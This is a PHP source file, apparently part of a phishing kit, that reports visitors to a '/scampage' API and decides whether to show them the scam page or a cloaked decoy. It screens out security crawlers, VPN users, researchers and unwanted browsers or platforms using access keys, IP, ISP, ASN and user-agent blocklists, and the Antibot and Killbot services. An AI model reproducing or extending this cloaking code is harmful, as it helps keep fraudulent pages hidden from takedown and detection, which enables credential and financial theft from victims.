<?php
require_once dirname(__FILE__) . '/header.php';

$configuration = $main->configurationGetProps();
if (!isset($configuration['parameter_whitelist'])) $configuration['parameter_whitelist'] = $main->RandUnik(124);
if (empty($configuration['parameter_whitelist'])) $configuration['parameter_whitelist'] = $main->RandUnik(124);
if (!isset($_GET[$configuration['parameter_whitelist']])) {
    $pBlocker = $configuration['personalizedBlocker'];
    if ($pBlocker) {
        if (!$main->sessionGet('blocker_personalized_safe')) {
            $pBlockerD = $main->apiGet('/scampage/_/visitor/bot', [
                'ip' => $main->ipGetAddress(),
                'useragent' => $_SERVER['HTTP_USER_AGENT'],
                'domain' => $_SERVER['SERVER_NAME'],
                'referer' => (isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''),
                'sessionid' => $main->sessionGetID(),
            ]);

            // Get Project ID
            if (isset($pBlockerD['data']['projectid'])) {
                if (!empty($pBlockerD['data']['projectid'])) {
                    $main->sessionSet('projectid', $pBlockerD['data']['projectid']);

                }
            }

            if (isset($pBlockerD['status'])) {
                if ($pBlockerD['status']) die($main->logMessage('Blocked by Personalized Blocker (' . (isset($pBlockerD['message']) ? $pBlockerD['message'] : 'Unknown Reason') . ')')->cloakGenerate());
        
                // Safe
                $main->sessionSet('blocker_personalized_safe', true);
            }
        }
    }
    
    $useAK = $configuration['useAK'];
    if ($useAK) {
        if (!$main->sessionGet('blocker_ak_safe')) {
            $key = '';

            //
            if (isset($_REQUEST['key'])) {
                if (!empty($_REQUEST['key'])) {
                    $key = $_REQUEST['key'];

                }
            }

            //
            $ak = $main->apiGet('/scampage/_/accesskey/safe?key=' . urlencode($key));
            if (!$ak['status']) {
                die($main->logMessage('Blocked by Access Key (' . (isset($ak['message']) ? $ak['message'] : 'No Message') . ')')->cloakGenerate(false, 403));

            }

            // Safe
            $main->sessionSet('blocker_ak_safe', true);
        }
    }
    
    
    $useBlackboxIpBlocked = $configuration['useBlackboxIpBlocked'];
    if ($useBlackboxIpBlocked) {
        if (!$main->sessionGet('blocker_vpn_safe')) {
            $blackbox = $main->curl('https://blackbox.ipinfo.app/lookup/' . $main->ipGetAddress());
            if (!empty($blackbox)) {
                if ($blackbox == "Y") {
                    die($main->logMessage('Blocked by BlackBox')->cloakGenerate(false, 403));
            
                }
            }
        
            // Safe
            $main->sessionSet('blocker_vpn_safe', true);
        }
    }
    
    if ($main->blockerIsBlocked($main->ipGetAddress())) {
        die($main->logMessage('Blocked by Current Blocker Pool')->cloakGenerate(false, 301));
    
    }
    
    // Parameter (Detect Once)
    if (!$main->sessionGet('blocker_parameter_safe')) {
        $parameter = $configuration['parameter'];
        if (!empty($parameter)) {
            if (substr($parameter, 0, 1) == "?") $parameter = substr($parameter, 1, strlen($parameter));
            $referrer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
            if (!isset($_GET[$parameter]) && !strpos($_SERVER['REQUEST_URI'], ('?' . $parameter)) !== false && !strpos($referrer, ('?' . $parameter)) !== false) {
                die($main->logMessage('Accessed Without Parameter!')->cloakGenerate(false, 403));
                
            } else {
                // Safe
                $main->sessionSet('blocker_parameter_safe', true);
    
            }
        }
    }
    
    $browser = $main->getBrowser();
    
    // Platform Check
    $platformLinux = $configuration['platformLinux'];
    if (!$platformLinux && $browser['platform'] == "linux") die($main->logMessage('Blocked by Because Linux Platform')->cloakGenerate());
    $platformWindows = $configuration['platformWindows'];
    if (!$platformWindows && $browser['platform'] == "windows") die($main->logMessage('Blocked by Because Windows Platform')->cloakGenerate());
    $platformMacOs = $configuration['platformMacOs'];
    if (!$platformMacOs && $browser['platform'] == "mac") die($main->logMessage('Blocked by Because MacOs Platform')->cloakGenerate());
    $platformOther = $configuration['platformOther'];
    if (!$platformOther && $browser['platform'] == "Unknown") die($main->logMessage('Blocked by Because Unknown Platform')->cloakGenerate());
    
    // Browser
    $browserIE = $configuration['browserIE'];
    if (!$browserIE && $browser['ub'] == "MSIE") die($main->logMessage('Blocked by Because Using Internet Explorer Browser')->cloakGenerate());
    $browserFirefox = $configuration['browserFirefox'];
    if (!$browserFirefox && $browser['ub'] == "Firefox") die($main->logMessage('Blocked by Because Using Firefox Browser')->cloakGenerate());
    $browserOpera = $configuration['browserOpera'];
    if (!$browserOpera && $browser['ub'] == "Opera") die($main->logMessage('Blocked by Because Using Opera Browser')->cloakGenerate());
    $browserChrome = $configuration['browserChrome'];
    if (!$browserChrome && $browser['ub'] == "Chrome") die($main->logMessage('Blocked by Because Using Chrome Browser')->cloakGenerate());
    $browserSafari = $configuration['browserSafari'];
    if (!$browserSafari && $browser['ub'] == "Safari") die($main->logMessage('Blocked by Because Using Safari Browser')->cloakGenerate());
    $browserEdge = $configuration['browserEdge'];
    if (!$browserEdge && $browser['ub'] == "Edge") die($main->logMessage('Blocked by Because Using Edge Browser')->cloakGenerate());
    $browserOther = $configuration['browserOther'];
    if (!$browserOther && $browser['ub'] == "") die($main->logMessage('Blocked by Because Using Other Browser')->cloakGenerate());
    
    $blockBadHostname = $configuration['blockBadHostname'];
    if ($blockBadHostname) {
        $main->blockerIsBadHostname();
    
    }
    
    $blockBadISP = $configuration['blockBadISP'];
    if ($blockBadISP) {
        $main->blockerIsBadISP();
    
    }

    $blockBadASN = $configuration['blockBadASN'];
    if ($blockBadASN) {
        $main->blockerIsBadASN();
    
    }
    
    
    $blockBadReferrer = $configuration['blockBadReferrer'];
    if ($blockBadReferrer) {
        $main->blockerIsBadReferrer();
    
    }
    
    $blockBadUA = $configuration['blockBadUA'];
    if ($blockBadUA) {
        $main->blockerIsBadUseragent();
    
    }
    
    $blockBadIP = $configuration['blockBadIP'];
    if ($blockBadIP) {
        $main->blockerIsBadIP();
    
    }
    
    $antibotKey = $configuration['antibotKey'];
    if (!empty($antibotKey)) {
        if (!$main->sessionGet('blocker_antibot_safe')) {
            $antibot = json_decode($main->curl("https://antibot.pw/api/v2-blockers?ip=" . $main->ipGetAddress() . "&apikey=" . $antibotKey . "&ua=". urlencode($_SERVER['HTTP_USER_AGENT'])), true);
            if ($antibot['is_bot'] || $antibot['block_access']) {
                $main->apiGet('/scampage/_/visitor/bot-detected', [
                    'from' => 'antibot',
                    'ip' => $main->ipGetAddress(),
                ]);
                die($main->logMessage('Blocked by Antibot')->cloakGenerate(false, 403));
    
            }
    
            // Safe
            $main->sessionSet('blocker_antibot_safe', true);
        }
    }
    
    $killbotKey = $configuration['killbotKey'];
    if (!empty($killbotKey)) {
        if (!$main->sessionGet('blocker_killbot_safe')) {
            $killbot = json_decode($main->curl("https://killbot.org/api/v2/blocker?ip=" . $main->ipGetAddress() . "&apikey=" . $killbotKey . "&ua=". urlencode($_SERVER['HTTP_USER_AGENT'])), true);
            if (isset($killbot['data'])) {
                if ($killbot['data']['is_bot'] || $killbot['data']['block_access']) {
                    $main->apiGet('/scampage/_/visitor/bot-detected', [
                        'from' => 'killbot',
                        'ip' => $main->ipGetAddress(),
                    ]);
                    die($main->logMessage('Blocked by Killbot')->cloakGenerate(false, 403));
            
                }
            }
    
            // Safe
            $main->sessionSet('blocker_killbot_safe', true);
        }
    }
}